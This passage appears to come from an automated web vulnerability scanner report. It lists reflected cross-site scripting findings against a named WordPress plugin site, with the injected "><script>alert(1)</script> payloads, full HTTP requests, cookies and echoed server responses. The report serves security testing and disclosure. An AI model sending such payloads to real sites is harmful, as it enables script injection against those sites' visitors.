X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674586+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674587; expires=Thu, 02-Feb-2012 19:23:07 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:07 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-postsincatfda27\"><script>alert(1)</script>618a4ef6632/plugin-data/superslider/ssPostinCat/default/default.css" />
...[SNIP]...

1.245. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad888"><script>alert(1)</script>85bc6e4dd3f was submitted in the REST URL parameter 5. This input was echoed as ad888\"><script>alert(1)</script>85bc6e4dd3f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-postsincat/plugin-dataad888"><script>alert(1)</script>85bc6e4dd3f/superslider/ssPostinCat/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:08 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674588+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674588; expires=Thu, 02-Feb-2012 19:23:08 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:08 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-postsincat/plugin-dataad888\"><script>alert(1)</script>85bc6e4dd3f/superslider/ssPostinCat/default/default.css" />
...[SNIP]...

1.246. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95bf9"><script>alert(1)</script>06d6b0fc251 was submitted in the REST URL parameter 6. This input was echoed as 95bf9\"><script>alert(1)</script>06d6b0fc251 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-postsincat/plugin-data/superslider95bf9"><script>alert(1)</script>06d6b0fc251/ssPostinCat/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:09 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674590+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674590; expires=Thu, 02-Feb-2012 19:23:10 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:10 GMT
Connection: close
Content-Type: text/h